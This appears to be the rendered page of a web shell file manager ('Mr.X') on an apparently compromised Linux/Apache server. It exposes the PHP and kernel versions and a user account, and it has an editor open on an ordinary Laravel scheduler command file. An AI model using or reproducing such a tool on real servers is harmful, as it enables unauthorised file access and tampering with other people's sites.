🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:SchedulePauseCommand.php
<?php namespace Illuminate\Console\Scheduling; use Illuminate\Console\Command; use Illuminate\Console\Events\SchedulePaused; use Illuminate\Contracts\Cache\Repository as Cache; use Illuminate\Contracts\Events\Dispatcher; use Symfony\Component\Console\Attribute\AsCommand; #[AsCommand(name: 'schedule:pause')] class SchedulePauseCommand extends Command { /** * The console command description. * * @var string */ protected $description = 'Pause the scheduler'; /** * Execute the console command. * * @return int */ public function handle(Cache $cache, Dispatcher $dispatcher) { if (! Schedule::$pausable) { $this->components->error('Schedule pausing is currently disabled.'); return 1; } $cache->forever('illuminate:schedule:paused', true); $dispatcher->dispatch(new SchedulePaused); $this->components->info('Scheduled task processing has been paused.'); return 0; } }
Save Changes
Cancel
Create New File
Create New Folder